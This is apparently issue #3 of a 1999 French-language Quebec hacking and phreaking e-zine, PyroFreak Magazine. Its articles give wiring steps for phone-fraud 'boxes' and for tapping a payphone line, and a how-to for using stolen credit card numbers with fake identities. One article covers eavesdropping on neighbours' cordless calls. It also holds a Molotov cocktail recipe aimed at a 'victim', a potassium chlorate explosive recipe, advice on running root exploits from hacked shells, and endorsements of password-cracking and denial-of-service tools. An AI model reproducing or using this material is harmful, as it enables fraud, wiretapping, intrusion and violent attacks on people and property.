-::-Vive le sex! Vive le Pot! Vive la Révolution!!! _____ _____ _ ______ ______ __ ___ _________ |: __ _ \ \ \ / / | ____ | / ___ | | \__ _\ \ \ \/ ; / |; /_ _/ | / / /; | | ____ __ ___\ \ : / |: _ / | / / : | |: | / , / |, | \ : \ | :\__/ | |; | ___/ . / |. | \ ; \ | ; / |___\ \________/ |___\ \__ ____\ |_________/ ____ _ ___ __ ___ ___ ______ __ _______ |: _ _ ;\ | \ \ \ / ;| | | / . / | | \_______\ |: _\ \_ _\ / /| :| | ;| / / _| |___ _____ |; |__ ____ / <_| ,| | |/ : / |_|, ___| |; .\ | __\ \_:__\ / _ | | ;/ |: | |: ` / | :|____ ____ \ / |; | | |\ \ |; | |, |\ \ | ; \ \ ;\ \/ |: | |: | \ .\ |___\ |__| \_| |________\ \____\ |____| |___\ \_____\ Crédit: __2 1 Avril 1999 Vous devez lire ceci avant d'aller plus loin Pyrofreakmag (et ses membres) tient a avertir les gens qui vont continuer a lire le texte qui va suivre: Ont n'est aucunement responsable des actes, et meme des pensés qui pourraient etre produites par les lecteurs de ce zine par rapport a nos articles . Nous tenons a mettre cela bien au clair. Si vous n'etes pas d'Accord avec cet affirmation, fermer ce texte, et effacer le de votre disque dur ou sur tout autres disques. Vous etes le seul responsable de vos actes. Comment nous rejoindre?: Voici les moyens de rejoindre Pyrofreakmag et ses membres. Soit sur IRC, sur #phreak.fr ,via le serveur undernet. Soit par e-mail: pyrofreakmag@hotmail.com | Pour tous les membres neuro@frphreak.com | Pour rejoindre Neuro lordendrix@hotmail.com | Pour rejoindre Endrix darkm0nk@rocketmail.com | Pour rejoindre [G]r4FX NuClEaR@nuc99.com | Pour rejoindre Nuclear you_are@a.sucker | Pour le service des plaintes Et vener visiter notre site web: http://pyrofreak.cjb.net ou http://bill.gates.suck.trop.des.fallus.a.mon.gout.usuck.com Si vous voulez que votre article paraisse dans le #4, envoyer le a pyrofreakmag@hotmail.com . Ou si vous avez des questions, envoyer les aussi a pyrofreakmag@hotmail.com ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #3 : | TABLE DES MATIERES '.________ __ __ ___________ ____ ______________ ____ ___ ______ __ __ TITRE DE L'ARTICLE NICK DE L'AUTEUR Intro Neuro Aero Box Endrix Les Exploits [G]r4FX Utilités des # de credit card Neuro Espionage Téléphonique Endrix Black Box (Plus complet) Endrix Coktail Molotof Endrix Cours sur les explosifs #1 $$$$$ Crap Box Endrix Critiques de Programmes Endrix Les IRCD (Internet Relay Chat Deamon) Nuclear Conclusion Neuro ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #3 : | Intro '.________ __ __ ___________ ____ ______________ ____Par Neuro__ __ Bon pour le #3, on a essayer de l'amiliorer de facon considérable, et cela a cause des mauvaises critiques pour le #2. De ma part, je suis pas mal satisfait du résultat, a vous d'en juger. On a inclus un petit programme de PWLcracker avec le zine, et cela apres avoir eu plusieurs demandes pour ce type de programme. NOTICE: Moi, Neuro, j'ai pas eu beaucoup le temps d'écrire pour ce zine, je vais me reprendre dans le prochain numéro. L'avenir ce cette zine : ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Bon, comme tout les groupes de hacking/phreaking Québécois, notre but est d'améliorer la scène du Québec dans ce genre de chose. Donc, maintenant, notre groupe, Pyro-Phreakers magazine, vont plus toucher au Phreaking que tout autre sujet. Donc voici quelques domaines que nous allons toucher : - Cellular Phreaking - Telephone Phreaking - Plus sur les PbX's - Ondes et fréquences - Boxes - Fontionnement du système téléphonique de BELL - et autres... Donc, si vous êtes bon dans ce domaine et que aimeriez être dans un groupe comme le notre, hey bien envoyez-nous un email à pyrofreakmag@hotmail.com avec le contenue des choses que vous savez faire et nous allons vous recontacter à ce sujet. Joke du mois: De la part de BuBBle: Deux spermatozoïdes sont en pleine discution. Le premier dit à son compatriote : "Dis, c'est encore loin les ovaires ?" Le second lui réponds : "Tu parles, on n'est encore qu'aux amydales." ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #3 : | $Aero BOX$ '.________ __ __ ___________ ____ ______________ ____Par Endrix__ __ But de cette box : ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Bon, cette manière de phreaking peut être utiliser pour faire des appels gratuits intérieurs ainsi qu'extérieures(même en Australie). Ca peut être dur à faire marcher sur quelques téléphones publiques mais dans l'ensemble ca doit marcher. Avant de partir, je vous suggère de prendre une petite marche et d'aller voir pour trouver un telephone publique pour savoir quelle sera le meilleur manière de le faire fonctionner sur ce telephone. Outils dont vous aurez desoin : ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ - Un couteau(petit pour auter de la protection PVC. Ce qui est le tube de métal qui protège contre le monde de toucher aux fils). OU Un tourne-VIS(si la ligne téléphonique va la le planché et qui passe en dessus d'une plaque de métal qui peut être dévissé très facilement) - Un changeur de fil(ou Phone socket) : + = Visses || || <-Ligne de téléphone _____||_____ | / \ <-Ligne qui est connecté et donc vous pourrez voir | +/ \+ | l'intérieur du fil | ( ) | | + ( ) +| | ( ( ) ) | | ( ) | ) = fils enveloppés de plastique de différence couleurs |____||||||__| ||| ||| ||| <-Ligne téléphonique qui est connecté au téléphone ||| (Couleur : Crème, Noir ou blanc) Téléphone - Des fils déjà arrangé(vous aurez auter les bouts de platique à chaque extrémité des fils) - Des siceaux (pour couper des fils) - Un coupeur de fil(pour auter le plastique qui recouvre le fil en cuivre) thats it... Construction : ¯¯¯¯¯¯¯¯¯¯¯¯¯¯ 1 - Arrangez vous pour trouver les fils. Soit en dessous de la plaque de métal ou dans le tube qui protège les fils. 2 - Vous trouverez plusieurs fils.. Voici la combinaison : a) Plusieurs fils et 2 fils noirs qui sont la plupart du temps ensembler(vive bellll !!) Si vous trouvez cette combinaison : 1) Séparez les 2 fils noirs avec les siceaux 2) Utiliser les pinces pour auter quelques centimètres de plastiques sur les 2 fils noirs. 3) Couper les autres fils 4) Dévisser les + 5) Connecter les fils noirs aux + (du phone socket) et à l'autre bout du socket, votre téléphone || + = visses || <- Fils noirs _____||_____ | / \ <-fils noirs qui arrives et qui se connecte au visses du socket | +/ \+ | | | | + + | | | | | |____||||||__| ||| ||| ||| <-Fils qui se connecte au téléphone ||| (Couleur : Crème, Noir ou blanc) Téléphone C'est finnit !!!! Maintenant il va être possible pour vous, de faire des appels gratuit avec ce système. Mais j'ai une meilleur idée pour vous... Si vous connectez votre modem à la place de votre téléphone ?? hein ?? HeY oui, il va être possible de faire ca et maintenant vous pourrez pirater n'importe quoi ! ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #3 : | Les Exploits '.________ __ __ ___________ ____ ______________ ____ Par [G]r4FX __ __ [G]r4FX ___________ ___ __ | | \ \ / / | ______| \ \ / / | | \ \ / / | |______ \ \ / / | | \ \/ / | ______| / _ \ | | / / \ \ | |______ / / \ \ | | / / \ \ |__________| /__/ \__\ pl0its par [G]r4FX -==Expl0its==- Dans le monde du hacking, un outils important sont les "Expl0its". Beaucoup de gens se demande que sont-ils, que font-ils et comment les utiliser. J'ai décidé d'écrire ce texte pour ceux qui ont la tête dûr et qui ne savent pas encore c'est quoi. Je suis sur que ce texte va êtres utile à beaucoup de monde... -==Qu'est-ce que'un "Expl0it"==- Bon pour faire une définitions pas trop fucké d'un "Expl0it", je vais commencer comme ca ! C'est un programme qui exploite un ou des "bugs" dans un "sotfware" spécifique. Chaque "Expl0its" est différents, exploite des bugs différents, et fait des choses différentes. C'est pourquoi chaque "Expl0its" est spécifique à un programme en particulier. Les "Expl0its" ont été codés pour avoir accès au compte "root" ou (en français correct) le compte Administrateur du système. Ils accèdent à ces comptes en exploitant un "bugs" dans un certain programme, si celui-ci est utilisé par l'utilisateur "root". Sur les OS (Operating system) de type UNIX, certains programmes ou scripts doivent êtres roulés par l'utilisateur "root" (ou pour vous facilité la taches: l'UID 0) dans le but d'effectuer une tâche qui ne peut pas âtres effectuée par les autres utilisateurs. Donc en termes facile, un "Expl0it" fait crasher le programme qui roule en "root" pour vous donner l'invite (prompt) du root. TRÈS souvent c'est celui-ci #. -==Comment on utilise un "Expl0it"==- Les "EXpl0its" sont codés a 99% du temps en langage C. Pour utiliser votre "Expl0it" il vous faut : 1- un "shell" sur une boite (box) du système que vous voulez utilise le "Expl0it". -=OU=- 2- Vous devez utiliser le même OS que la boite (box), que vous voulez hacker, utilise. Pour utiliser un "Expl0it" vous devez compiler le code source, ou le binaire dans votre répertoire de travail du shell. Bien entendu vous voulez utiliser un "shell account" hacké ou un shell qui ne vous appartiens pas... Pour copier le code source ou le binaire du "Expl0it" dans votre shell, utiliser un programme FTP (CuteFTP ou autres) et "uploader" l'Expl0it, ou bien utiliser "rz" si vous possédez un "dialup shell". J'espère que vous savez tous comment utiliser un programme FTP. Une fois l'exploit uploader sur le système il reste seulement à le compiler ce qui ce fait comme suit : user:/$ cc exploit.c -o exploit Cette commande devrait compiler votre exploit. --==ATTENTION==-- Certains codeurs aiment rire des gens qui ne connaisse pas le C, ils vont insérer un bugs dans l'exploit pour qu'il ne se compile pas ou même encore pour qu'il ouvre un port (backdoor) dans votre système pour ensuite vous hacker. Donc si vous compiler et utiliser des code en C.. . il serait souhaitable que vous connaissiez le C ne serais-ce qu'un tout petit peu pour voir si ces salauds n'ont pas fait de leur exploit un backdoor. Bon... vous avez compilé votre exploit. Maintenant si tous a bien été vous devriez êtres en mesure de l'utiliser... le fun commence. Vous allez savoir que l'exploit a fonctionné, si vous voyez l'invite (prompt) de utilisateur "root" (#) à la place de celui des utilisateurs normaux ($). Mais, ce ne sont pas tous les exploit qui fonctionne pareil, il peut arriver que certains exploit demande des lignes de commandes différentes. Donc, il est très important de lire la documentation qui vient avec... On n'a d'l'air moins con se documenter que de flopper sont hack. -==Voici quelques site ou vous trouverez de bon exploits.==- http://www.insecure.org/sploits_linux.html ===> expl0its pour le OS Linux http://www.rootshell.com ===> tres kwel site! update très souvent. -==Credits:==- endrix === > pour le site : http://www.insecure.org/sploits_linux.html ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #3 : | Utilités des # de credit card '.________ __ __ ___________ ____ ______________ ____ Par Neuro __ __ Vous est t'il déja arriver d'obtenir des numeros de carte de crédit ainsi que la date d'expiration de celle-ci, et d'avoir eu la confirmation que votre # est valide? Si oui, vous vous avez surement poser comme questions, Quoi faire avec ces numeros de Credit card? L'article qui va suivre va traiter de ce sujet, qui n'a pas encore été aborder dans d'autres zines auparavant selon ma connaisance. Bonne lecture!!! Technique #1: Voici la premiere de tous, surement la plus simple et la moins utile. Elle consiste a s'aboner a un site XXX. Souvent cette technique est utiliser pour vérifier la validiter de la carte, parce que cette technique ce fais tres rapidement (quelques minutes). Vous allez sur un site XXX conventionnel qui accepte les #cc(numeros de carte de crédit), et vous aller dans la section Join pour vous abonner. Il vont vous demander votre nom, adresse, # de tel,etc. Donner que de fausses informations. Pour le pays, inscriver le pays d'ou provient la carte, parce que celui-ci est souvent vérifier en meme temps que la carte. Ensuite vous avec 4 espaces a remplir demandant ceci: Type de carte (VISA/MASTERCARD/....) Nom du porteur de la carte: Numero de la carte: Date d'expiration: Pour le type de carte, si vous l'avez pas encore, c'est assez simple pour le trouver. Visa commence habituellement leur # de carte par le chiffre 4 au Canada et au USA, tandis que MasterCard commence par 5 au Canada et au USA. Pour le nom du porteur de la carte, n'importe quel peu faire l'affaire (A l'exeption pres, dépendant de la sécuriter du site), mais dans 90% des cas, cette information n'est pas vérifié. Numero de la carte: Votre numero valide que vous avez trouver Date d'expiration: Ainsi que la date d'expiration. Ensuite vous avez juste a cliquer sur le petit bouton CGI qui vérifie votre demande immédiatement en moins de 2 mins, si vous etes accepter, votre carte est valide. Sinon, soit que votre carte est invalide, soit que son solde est trop bas. Voici quelques adresses de site XXX acceptant les #cc: http://www.truly18.com http://www.sexroulette.com http://www.perfect10s.com etc.......... PS: Faire ceci avec une connection internet hacker, ou avec un proxy, pour pas avoir de problemes. ____________________________________________________________________________ Technique #2: Celle-ci est beaucoup plus intéressante, mais aussi plus risquer. Elle consiste a s'acheter des billets de spectacles. Pour le Quebec, je vais prendre l'exemple du réseau admission. Vous avez juste a appeler au réseau admission pour acheter vos billets. A ce point-ci ils vont vous demander les informations suivantes: Quel spectacle? Fausse informations: Prénom: Nom: Tel: Vrai informations: type de carte: # de la carte: date d'expiration: Il vont vous demandez de venir chercher vos billets quand vous allez avoir le temps. Quand vous allez chercher vos billets, il vous faut une fausse carte d'identiter correspondant aux informations que vous avez donner au téléphone. Pour plus d'informations sur les fausses cartes d'identités, aller lire HAQCH #1, un article sur ce sujet a été écrit dans ce numero. Il reste juste a aller ramamser vos billets, et le tour est joué. Je vous recommande d'acheter votre billet une journer ou 2 avant le spectacle, sinon vous risqueriez peut-etre de vous faire buster a votre siege durant le show. ____________________________________________________________________________ Pour les prochaines techniques, je vais juste dire le sujet de la technique, parce que ca me tente pas de faire un article de 100ko sur ce sujet. Technique #3: Vous abonner a une connection internet par téléphone (Pour 1 ans c'est préférable) Technique #4: Vous abonner a un Shell, mais de plus en plus rare sont ceux qui accepte les #cc , a vous de les trouvers. Technique #5: Faire venir des chose (colis) via le net, ou par telephone a une maison abandonner, mais cette technique demande extremement de préparation, et elle est aussi une des plus risquée. Technique #6: Vous faire livrer de la bouffe (Pizza,poulet,etc..). La encore, cela demande de la préparation, et ne fonctionne pas a toutes les places, quelques restaurants demande de voir la carte de crédit avant de vous donner la livraison. Dans un prochain numéro, d'autres techniques vont etres abordées et plus en profondeur. Si vous en avez vous aussi qui n'on pas été m'entionnées ici, envoyer les moi par e-mail a: neuro@frphreak.com ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #3 : | Espionage téléphonique '.________ __ __ ___________ ____ ______________ ____ Par Endrix __ __ ________________________________________________ <((Espionage téléphonique avec un téléphone sans-fil))> ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Bon, tout a commencé par un bel après midi.... Oui allo ?! HEY FRED !!! Quessé tu fous ??? HEY SEB !!!!! bah po grand chose d00d toi ? Heille man ya un super Party a soir tu peux venir ??? coliss oui, chez ki ??? chez pouet d00d pi... peux-tu me pogner de la w33d ??? 30secondes... Bon, la pour faire ce genre de chose, il faut sortir dehors sinon les parents aimeraient pas vraiment ca entendre ca... Alors je sort par la porte du devant, avec mon téléphone sans-fil et commence à me promener(sur le même bord de la rue..) Alors ca la conversation continue .... bon ok on peut parler !!! ouin j'aimerais en avoir 2 gr .. Tu peux en pogner ? ben cartin caliss alright man je viens chez toi talleur !!! ok man... Bon la, la conversation continue.. Le restant n'est pas important !! Je commence à traverser la rue, encore avec mon téléphone sans-fil et rendu l'autre bord, la communication coupe !! J'attend, j'attend.. rien !! Tout d'un coup, j'entend du monde parler.. What the FUCK ???? Ben oui !! Alors la je reviens sur le bord de ma mais0n pour laisser mon ami et je retourne l'autre bord.. 2 personnes ce parle... J'entend aussi bien que si c'était moi qui parlait au téléphone. Je peux entendre mais pas parler. La, je commence à me poser des questions.. Tout d'un coup, j'entend le nom de la personne, c'était ma voisine de 2 maisons(très cute en passant.. ;)) ). Donc la je suis allé la voire et je lui ai demandé quel téléphone elle avait. C'était pas le même mais sont téléphone utilisait la même fréquence que le mien. C'est alors que je me suis pauser la question suivante : Est-ce possible de faire ca avec tout les téléphones qui on la même fréquence que le mien ??? HEY OUI !!!! Mais comment ??? Ben je connais un d00d qui travaille au Radio Shack et je lui ai demandé si c'était possible de scanner les fréquences dans la ville pour trouver la même que la mienne. Finallement, oui !! Il a un petit appareil qui fait ca. Alors je l'emprunte(pour le ramener plus tard) et le je me suis amusé toute la journée à faire ca. Dès que je capte la même fréquence que mon téléphone, je l'allume et j'écoute. Je vous avertis, ce genre de chose ne marche pas à tout les coups. Je me suis fait souvent couper la ligne par je sais pas trop quoi mais environs 1 fois sur 2 ou 3 ca doit marcher. Alors maintenant, vous saurez comment espionner vos amis(es) qui ont les même téléhones que vous et les faire chier le lendemain avec ca !!! Je suis que sur un téléphone sans-fil, il y a une puce comme les avios téléguider, bien tout ce qui marche à commande qui définnit la fréquence exacte pour le faire fonctionner. Ces puces ce vendent alors je vais tester quelques petites choses et probablement que je vais être capable d'espionner plusieurs fréquences de téléphone pour entendre le plus de conversation. Si c'est possible, je vais aller demander à du monde de voir leurs téléphones et... sans rien faire savoir, je vais me procurer la fréquence du téléphone et aller acheter la puce qui fonctionne avec ca!!! Voilà !!! ;) Happy phreaking ! ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #3 : | $Black Box$ '.________ __ __ ___________ ____ ______________ ____Par Endrix__ __ But de cette BOX : ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Une Black BOX est un montagne qui arrange votre téléphone de manière que quant une personne de l'extérieur va appeller chez vous, l'appel va être gratuit pour cette personne. Donc, si votre tante appel tout le temps(comme dans mon cas à moi) l'appel va être gratuit pour elle. Ce système peut être bon pour des appels jusqu'à 30 minutes amis après ca, Bell va commencer à ce poser des questions et dans ce cas, hehe c'est pas bon !! ;) Comment ca marche : ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Ce que cette BOX peut faire, est d'empêcher que le voltage baisse jusqu'à 10v quand tu réponds au téléphone. Donc ce petit bébé garde le voltage de la ligne à 36v et ca va faire pensé à Bell que le téléphone sonne encore pendant que tu parles. Toutes les pièces peuvent être acheté chez Radio Shack. Ca va vous coutez moins de 2$ pour faire ca. Contruction : ¯¯¯¯¯¯¯¯¯¯¯¯¯ Schéma #1 pour la plupart des téléphones : LED : Petite lumière qui conduit le courant ** LED ON: BOX ON ** Ligne >--------------------VERT--> AU Téléphonique >--+ 1.8k LED +-ROUGE--> Téléphone |----///---|>--| | | +----->/<------+ Interrupteur Équipement : ¯¯¯¯¯¯¯¯¯¯¯¯ - 1 Résistance de 1.8k de 0.5Watts - 1 LED de 1.5v - 1 Interruteur Bon Hey bien pour le faire, veuillez suivre le schéma expliquer ci-dessus. Faites tout bien à la lettre et vous verez que ca marche très bien. Contruction : ¯¯¯¯¯¯¯¯¯¯¯¯¯ Schéma #2(la plus utilisé) : ** LED ON: BOX OFF ** De la >---------------VERT--> Au Ligne >-----+- +-Rouge--> Téléphone | LED | +->/<--|>-+ | | +--///--- 1.8k >/< = Intérrupteur Vous aurez besoin du même équipement. Voici un schéme plus expliqué : Schéma #1 Schéma #2 ************** **************** * * * +-----+ * * +---+ * * | | * * | | * * | * * Résistanc| * * | | | * * | | * * | | / * * +------+ | * * | | \ * * | | * * | | / * * ++SWITCH++ * t * | | \ * t * | | * é * | | / * é * | | * l l * | | | * l L * | | * é i * | | | * é I>rouge- -rouge>p g>rouge- --+rouge>p g>-----GREEN---->h n>-----GREEN------>h n * * o e * * o e ************** n **************** n e e Quand vous aurez fait ce petit montage, vous devez figurer comment arranger les fils de la ligne téléphonique s'arrangent bien avec les fils du téléphone. Il ne faut pas avoir de l'expérience en électronique pour faire ce genre de chose. Peut'être que vous aurez à faire quelque modification pour le faire fonctionner mais c'est rien de difficile. Essayez demandez à une personne qu'elle appelle, juste pour voir si ca marche sinon, essayer de nouveau... Ce n'est pas dûr mais parfois ca peut prendre de la patience. Comment le faire marcher : ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Quand l'interrupteur est à On, vous allez juste pouvoir recevoir des appels et quand vous allez recevoir un appel, le LED va flashé et quand vous allez prendre le téléphone le LED va rester allumé pendant votre conversation. Près avoir parlé avec la personne, vous deverez mettre l'interrupteur à Off. ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #3 : | Coktail Molotof '.________ __ __ ___________ ____ ______________ ____Par Endrix__ __ O============O <|Introduction|> O============O Bon euhh... Par quoi commencer.... Un Coktail Molotof est du feu qui brûle très longtemps et ca brûle en tabarouette alors faites attention avec ce genre de chose le faite pas sur vous même(duh!) il faut choisir... Votre gardienne, votre prof de Francais.... ;) Matériels : ¯¯¯¯¯¯¯¯¯¯¯ - Une bouteille de verre d'un 1 litre(de préférence) - Le bouchon de la bouteille - 500 ml de combustible(Vodka, Gaz, Pétrole.....) - Quelque chose pour allumer(Linge imbibé dans le combustible, mèche..) - Un couteau qui coupe bien - Quelque chose pour allumer Fabrication(avec une mèche) : ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ 1- Faite un petit trou dans le bouchon pour pouvoir entrer la mèche 2- Verser le combustible dans la bouteille(vous pouvez toujours faire des méllanges de combustible... Moi je l'avais fait et une fois j'ai obtenue du feux de différente couleur...) 3- Remettre le bouchon et bien le visser 4- Trouver la victime et allumer ainsi que lancer la bouteille 5- RUUUUUUNNNNNNNNNNNNNNNNNNNNNNNN like hell !!!! Fabrication(avec un morceau de linge) : ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ 1- Trempé le morceau de linge dans le gaz 2- Verser le combustible dans la bouteille(vous pouvez toujours faire des méllanges de combustible... Moi je l'avais fait et une fois j'ai obtenue du feux de différente couleur...) 3- Rentrer le linge à moitié dans la bouteille 4- Trouver la victime et allumer ainsi que lancer la bouteille 5- euuuuu just don't stay there ok !!!! ;) O==========O <|Conclusion|> O==========O Bon hey bien j'espère que vous allez avoir du fun avec ca et ne vous faites pas mal svp !!!!! ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #3 : | Cours sur les explosifs #1 '.________ __ __ ___________ ____ ______________ _________________ __ Avant de continuer de lire cet article, je tient a mettre au clair que je ne peu etre tenu responsable (ni aucun autres membres du groupe (pyrofreak) de ce que vous aller faire avec le contenu de l'article qui va suivre.Si vous etes pas d'accord avec ca, effacer l'article sans le lire. Quelques regles a suivres: Si vous avez moins de 14 ans, LISEZ PAS L'ARTICLE Si vous etes CON,CAVE,ÉPAIS, LISEZ PAS L'ARTICLE Si vous etes un TERRORISTE, LISEZ PAS L'ARTICLE Si vous avez des persées suicidaire, LISEZ PAS L'ARTICLE Si vous etes un cris de fou, LISEZ PAS L'ARTICLE Si vous etes de la GRC ou autres agents de la paix LISEZ PAS L'ARTICLE Si vous etes un fan de la chimie LISEZ L'ARTICLE L'article qui suit doit etre pris comme une base de chimie. Bon, ca fais la troisieme fois que je recommence l'article, parce que c'est assez dure de parler d'explosif sans etre traiter de téroriste. C'est aussi pourquoi cet article n'a pas été signer par personne, pour pas avoir trop de probleme. Donc , voici le début de l'article, qui est tres court pour ce numero, car, je vais essayer d'adapter les prochains cours, pour qu'ils soient plus axés sur la chimie que sur les explosifs en tant que tel. Le plastique explosif Ingrédients 1 partie de Vaseline (géler de pétrole) 9 parties de Chlorate de Pottasium Le chlorate de Pottasium se retrouve dans tout bon magasin de produit naturel. Il coute environ 9$ pour 100 grammes. Mélanger ces produits ensembles, dans un endroit humide. Laisser toujours les produits mélangés dans un endroit humide, pour enlever les risques d'explosion involontaire. Quand je parle d'endroit humide, je veux dire tres tres humide. Comme dans un chaudron d'eau a 2 étage (bain mari). Ou dans une chambre de bain. 1 charge explosive de force moyenne correspond environ a 9 grammes de Chlorate de Pottasium et 1 gramme de Vaseline, se qui est suffisant pour faire exploser n'importe quel porte de maison moyenne. C'est pourquoi faut faire tres attention avec ce produit. Un moindre petit choc brusque peu le faire exploser. Laisser dans un endroit sec, peu avant utilisation. ATTENTION: Pour allumer ce produit, il faut ABSOLUMENT se servir d'un détonateur a distance, sinon c'est beaucoup trop dangereux. ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #3 : | $Crap BOX$ '.________ __ __ ___________ ____ ______________ ____Par Endrix__ __ But de la box : ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Bon... Pourquoi je l'ai appeller comme ca ? HeY bien c'est parce que c'est tellement simple à faire que c'est "crap". Je trouve que c'est la box la plus simple à faire. Elle sert à une et seule chose : enregistrer une conversation téléphonique. Mais de la manière que je le fait, la qualité de la transmition est presque parfaite. Matériel : ¯¯¯¯¯¯¯¯¯¯ - Un téléphone (duh!) - Des fils(préférence de couleur différente) - Pince pour auter le plastique sur les fils - Tourne-Vis - Enregistreuse - Fer à souder - Un adapteur d'écouteur(que tu branche dans ton système de son ou dans ton CD player) Comment le faire : ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ 1 - Avec le tourne-vis, ouvrir la parti du téléphone que vous parlez/écoutez dedans et l'ouvrir délicatement sans rien brisé. 2 - Vous devriez voir une petite plaque ou les 2 fils de l'écouteur et les 2 fils du micro de rejoignent pour pouvoir brancher le fil qui est au téléphone. 3 - Si vous le voyez, dégueiner 4 fils de couleur différente(de préférence) et de même longueur. 4 - Souder les 4 fils sur les 4 places de la plaque ou les fils ce rejoignent. C'est un travail délicat à faire parce qu'il ne faut pas qu'aucun fil ne se touche. 5 - Rassembler un fil de l'écouteur avec un du micro et le faire pour les 2 autres. Comme ca sur un fil vous aurez une pôle de l'écouteur et une du micro et de même pour les 2 autres. 2 fils du micro __________ __________ ________ \ 2 fils de / \ | ______ | \ l'écouteur / \ || ___ _|| ___ \ / ___ \ ||| __| |==/ \ ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ / \ <----- Écouteur |||| | |==\___/=================================\___/ | |||| \ ¯ <--- Micro____________________ / |||| \ / \ / |||| \___________/ _ \_________/ |||| | | |||| |_| = Plaque ||||____ |||_____+ ensemble------------------- ||_________ |_____ (adapteur) |__________+ ensemble----------------------|||||||===== 6 - Maintenant avec l'adapteur d'écouteur, il est supposé d'avoir 2 fils dessus(ca peut dépendre) Souder 2 fils à un de l'adapteur et 2 autre à l'autre fils Note : S'il y a 4 fils à l'adapteur, il faut les mettre 2 par 2. 7 - Brancher l'adapteur sur votre enregistreuse et appeller un ami et quand vous voullez enregistrer la conversation, peser sur REC !!! C'est tout, super simple et utile !!! ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #3 : | Critiques de Programmes '.________ __ __ ___________ ____ ______________ ____Par Endrix__ __ Bon, hey bien dans ce texte je vais vous dire quels outils de hacking, phreaking... sont les meilleurs et lesquels sont poches. Le seul juge est moi alors il est possible que je me trompe en disant qu'un tel prog est poche quand il est super bon.. C'est mon opinion personnelle alors il faut en prendre et en laisser. Donc dans chaque ezine il va avoir un diagnostique sur quelque bon programme. ______________________________________________________________________ Analyse du programme : DScan Auteur(s) : B|aster URL de téléchargement : Http://pyrofreak.cjb.net OS : Windows 95, 98 Note sur 10 : 10/10 Note(s) du programme(s) : Ce programme ne contien aucun Bug Option(s) : HeY voila mon ami B|aster a fait un superbe IP Scanner qui fontionne très bien, même trop bien !!! Inclus dans le programme, il y a déjà de inclus dedans de certains serveurs de l'outaouais comme : Vidéotron, Cactuscom, Atréide .... C'est le IP scanner le plus vite que j'ai essayé à date. Je suis entrain de le convaincre de faire un autre version qui va avoir plus d'option dessus. Fonction(s) du programme : Domain Scanner Commantaire(s) Additionnel(s) : Il est vraiment bon aller le télécharger au vite pour l'essayer. ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ ______________________________________________________________________ Analyse du programme : Unsecure v1.2 Auteur(s) : Utah URL de téléchargement : Http://www.sniperx.net OS : Windows 95, 98 Note sur 10 : 10/10 Note(s) du programme(s) : Ce programme a comme fonction de cracker des sites web ou FTP. Il utilise des listes passwords et les essayes un après l'autre jusqu'à ce qu'il trouve le bon. Excellent programme et le plus vite. Bug free :)) Option(s) : - Attack from Dictionary file - Brute Force Attack : - a-z - A-Z - 0-9 - Tout les signes ASCII - Custom caracters set - Reconnect on Disconnect - AutoSave à chaque 100 essaits - Pause Attack - Peut saver la cession Fonction(s) du programme : Cracker des sites web ou ftp's Commantaire(s) Additionnel(s) : Trop bon et vite ;) ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ ______________________________________________________________________ Analyse du programme : Aggressor Exploits generator Auteur(s) : Aggressor Team URL de téléchargement : Http://www.aggressor.net OS : Windows 95, 98 Note sur 10 : 9/10 Note(s) du programme(s) : Le programme souvent a de la misère à auto- configurer le modem mais c'est très facile de le faire soit même. Aussi, avant d'arrivé à l'interface de travail du programme, il y a plusieurs fenêtres pour multiple raisons... Mais il est vraiment excellent et mérite d'être téléchargé au plus vite !!! Option(s) : - Suffer2 (SYN Attack, Spoofed IP) - Boink (Basé sur Teardrop) - Land - OOB Nuker (Spoofed) - PortScanner Fonction(s) du programme : Faire des attaques sur différentes machine Commantaire(s) Additionnel(s) : L'interface Simple et Avancé est très bien! ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ ______________________________________________________________________ Analyse du programme : octopus.c Auteur(s) : N/A URL de téléchargement : Http://www.rootshell.com OS : SunOS, Irix, Linux Note sur 10 : 8/10 Note(s) du programme(s) : Ce petit bébé fait planté une machine ;) /* This little program opens as many sockets with a remote * host as can be supported by both. It catches ^C and kill * commands to shut down 